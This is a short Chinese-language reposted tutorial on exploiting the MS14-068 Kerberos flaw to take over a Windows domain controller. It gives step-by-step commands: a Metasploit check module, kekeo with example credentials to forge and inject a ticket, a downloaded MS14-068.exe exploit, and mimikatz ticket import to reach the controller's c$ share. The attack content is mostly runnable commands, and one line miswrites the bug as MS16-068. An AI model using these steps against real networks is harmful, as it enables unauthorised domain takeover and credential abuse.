[域滲透]MS14-068利用


 一、利用

需要擁有一個域賬號的賬號密碼明文

net group "domain controllers" /domain 獲取主域控地址

使用msf對其漏洞進行檢測,如果漏洞利用成功會生成一個bin文件

poc:use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

 

利用工具:https://github.com/gentilkiwi/kekeo/releases

上傳exp至臨時目錄

 

klist  列出票據
klist purge  清除票據

 kekeo.exe "exploit::ms14068 /domain:yiwang.com /user:admin123 /password:admin@AAA... /ptt" "exit"

漏洞利用成功后成功訪問域控c$目錄

 

 

方法二、 

防止以msf爆出神奇操作,以msf檢測漏洞為標准的情況所以...

MS14-068:https://raw.githubusercontent.com/abatchy17/WindowsExploits/master/MS14-068/MS14-068.exe

漏洞利用:

Ms14-068.exe -u user1@humensec.com -p user@123 -s S-1-5-21-3858644736-3974512303-642681968-1134  -d 192.168.3.12

漏洞利用成功后桌面會生成 .ccache文件,證明存在MS16-068

mimikatz# kerberos::purge#清除原有票據

mimikatz# kerberos::list #列出當前票據,確保清除干凈

mimikatz# kerberos::ptc TGT_XXX.ccache #將偽造的TGT導入內存

dir \\域控\\c$

多dir幾次有可能會拒絕訪問

參考鏈接:

https://www.cnblogs.com/yuzly/p/10859520.html

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM